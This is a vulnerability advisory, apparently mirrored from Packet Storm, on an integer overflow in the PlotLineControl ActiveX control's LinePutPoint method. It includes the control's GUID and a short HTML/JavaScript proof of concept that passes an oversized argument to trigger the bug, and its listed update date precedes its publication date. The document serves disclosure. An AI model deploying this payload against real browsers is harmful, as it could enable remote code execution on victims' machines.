Lucene search
+L

PlotLineCentral Integer Overflow

🗓️ 31 Oct 2011 00:00:00Reported by demonalexType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

PlotLineControl ActiveX Control "LinePutPoint" Integer Overflow vulnerability in Version 2.

Code
`Title: PlotLineControl ActiveX Control "LinePutPoint" Integer Overflow  
  
Software: PlotLineControl ActiveX Control(Version 2.0)  
  
Vulnerability Published :2011-10-30  
  
Vulnerability Update Time :2010-06-10  
  
Vendor: No vendor response  
  
Impact: Median  
  
Bug Description:  
PlotLineControl is a free ActiveX Control which was easy for drawing circle.  
User-supplied data in "LineId" parameter is not properly integrity-checked before being copied into an insufficiently sized buffer in "LinePutPoint()" method.   
Successfully exploiting the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application using the ActiveX control.  
  
Class Info:  
Class PlotLine  
GUID: {70D036E3-60C0-11D7-B4C2-A7A5AF6F7E11}  
Number of Interfaces: 1  
Default Interface: PlotX  
RegKey Safe for Script: False  
RegkeySafe for Init: False  
KillBitSet: False  
  
PoC:  
****************************************************************  
<html>  
<body>  
<object classid='clsid:70D036E3-60C0-11D7-B4C2-A7A5AF6F7E11' id='target'></object>  
<script language='javascript'>  
var arg1 = 1;  
var arg2 = 1;  
var arg3 = 2147482111;  
target.LinePutPoint(arg1 ,arg2 ,arg3);  
</script>  
</body>  
</html>  
****************************************************************  
  
Credits: This vulnerability was discovered by demonalex (at) 163 (dot) com [email concealed]  
Pentester/Researcher  
Dark2S Security Team/PolyU.HK  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Oct 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
35